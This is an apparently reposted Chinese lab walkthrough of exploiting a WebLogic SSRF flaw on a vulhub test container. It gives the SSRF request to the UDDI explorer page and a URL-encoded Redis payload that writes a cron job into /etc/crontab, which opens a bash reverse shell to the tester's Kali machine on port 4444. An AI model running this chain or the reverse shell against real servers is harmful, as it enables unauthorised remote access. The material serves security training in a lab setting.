环境使用:kali、vulhub、burp suite(bp)
开始:打开vulhub,打开终端,进入root
ifconfig查看ip地址
找到ip 为192.168.147.139
查看端口开放情况,7001开放
浏览器打开192.168.147.139:7001,发现404报错,是客户端错误,说明服务端开启的,只是访问失败
在后面加上/uddiexplorer/SearchPublicRegistries.jsp,发现跳到这个页面
在后面加上
uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
访问失败,也说明了服务器能访问,可以使用漏洞
在vulhub输入docker ps 找到ID和NAMES 然后使用docker exec -it ID/NAMES ip addr 找到ip
打开bp,使用bp抓包,改包
打开kali,ifconfig,并打开4444端口,等待连接
将set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.147.128/4444 0>&1\n\n\n\n” config set dir /etc/ config set dbfilename crontab save 进行url编码
将编码内容加入到链接
发现kali的4444端口连接成功
退出,重新连接,一样成功
完成测试报告
转载:https://blog.csdn.net/ZYH_boss/article/details/102469634